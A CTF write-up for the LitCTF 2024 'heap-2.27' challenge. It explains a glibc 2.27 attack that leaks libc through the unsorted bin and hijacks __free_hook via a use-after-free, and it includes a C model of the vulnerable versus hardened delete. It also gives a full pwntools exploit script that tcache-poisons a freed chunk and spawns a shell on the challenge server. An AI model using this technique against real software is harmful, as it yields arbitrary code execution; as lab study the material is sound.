[LitCTF 2024]heap-2.27

Problem: [LitCTF 2024]heap-2.27

Approach

Leak a libc address through the unsorted bin and use it to locate __free_hook. The delete function has a use-after-free, which lets us modify a chunk that has already been freed; by overwriting the freed chunk's fd we can get malloc to hand back a chunk at an arbitrary address and hijack __free_hook. You need to know the conditions under which a chunk lands in the unsorted bin and how __free_hook hijacking works.
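The root cause this approach relies on is the dangling pointer that delete leaves behind. The C model below is an added example, not the challenge binary's source: the note table, sizes and function names are assumptions. It puts the vulnerable delete beside a hardened one that clears the slot so the index can no longer reach freed memory.

```c
#include <stdio.h>
#include <stdlib.h>

#define MAX_CHUNKS 16

/* Constructed model of a heap-menu note table; not the challenge binary's source. */
static char *chunks[MAX_CHUNKS];

static int create(int idx, size_t size) {
    if (idx < 0 || idx >= MAX_CHUNKS || chunks[idx] != NULL) return -1;
    chunks[idx] = malloc(size);
    return chunks[idx] ? 0 : -1;
}

/* Vulnerable delete: the chunk is freed but the slot keeps pointing at it.
 * Every later show()/edit() on this index then reads or writes freed memory,
 * which is the UAF the writeup uses to overwrite the freed chunk's fd. */
static int delete_vuln(int idx) {
    if (idx < 0 || idx >= MAX_CHUNKS || chunks[idx] == NULL) return -1;
    free(chunks[idx]);
    return 0;                      /* chunks[idx] is now dangling */
}

/* Hardened delete: free exactly once, then clear the slot so the index is
 * treated as empty and any later show()/edit()/delete() on it is refused. */
static int delete_safe(int idx) {
    if (idx < 0 || idx >= MAX_CHUNKS) return -1;
    if (chunks[idx] == NULL) return -2;   /* never allocated or already freed */
    free(chunks[idx]);
    chunks[idx] = NULL;
    return 0;
}

/* Returns 1 if the slot still passes the "is this index live?" check after
 * delete (so edit/show would reach freed memory), 0 if it is refused. */
static int slot_live_after_delete(int (*del)(int)) {
    if (create(3, 0x10) != 0 || del(3) != 0) return -1;
    int live = (chunks[3] != NULL);
    chunks[3] = NULL;              /* reset the model; the chunk was freed once already */
    return live;
}

int main(void) {
    printf("vulnerable delete leaves slot live: %d\n", slot_live_after_delete(delete_vuln));
    printf("hardened delete leaves slot live:   %d\n", slot_live_after_delete(delete_safe));
    printf("delete_safe on an empty slot:       %d\n", delete_safe(3));
    return 0;
}
```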

EXP

from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
#elf = ELF('./heap')
# local copy of the remote's glibc, used only for symbol offsets
lib = ELF('/root/tools/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6')
#io = gdb.debug('./heap')
io = remote('node4.anna.nssctf.cn',28014)

# menu wrappers: 1 = create, 2 = delete, 3 = show, 4 = edit
def create(idx,size):
    io.sendlineafter(b'>>',b'1')
    io.sendlineafter(b'idx? ',str(idx).encode())
    io.sendlineafter(b'size? ',str(size).encode())

def delete(idx):
    io.sendlineafter(b'>>',b'2')
    io.sendlineafter(b'idx? ',str(idx).encode())

def show(idx):
    io.sendlineafter(b'>>',b'3')
    io.sendlineafter(b'idx? ',str(idx).encode())

def edit(idx,content):
    io.sendlineafter(b'>>',b'4')
    io.sendlineafter(b'idx? ',str(idx).encode())
    io.sendlineafter(b'content :',content)

# chunk 1 is larger than the tcache limit, so freeing it puts it in the unsorted bin;
# chunk 2 keeps it from merging with top. show(1) then prints its fd (a main_arena address).
create(0,0x10)
create(1,0x420)
create(2,0x10)
delete(1)
show(1)

# 0x1c48 is the offset from the leaked main_arena pointer to __free_hook in this libc
free_hook = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))+0x1c48
log.info(hex(free_hook))
libc_base = free_hook-lib.sym['__free_hook']
sys_addr = libc_base + lib.sym['system']
#pause()

# UAF in delete: chunk 3 stays editable after free, so its tcache fd can be pointed at __free_hook
create(3,0x10)
delete(3)
edit(3,p64(free_hook))
create(4,0x10)
create(5,0x10)   # second allocation from the bin lands on __free_hook
#pause()
edit(5,p64(sys_addr))
edit(4,b'/bin/sh')
delete(4)        # free("/bin/sh") now calls system("/bin/sh")
io.interactive()

Summary

Learned a small trick: in pwngdb, `p &__free_hook` combined with `distance` can be used to work out the offset.

This post is licensed under CC BY 4.0 by the author.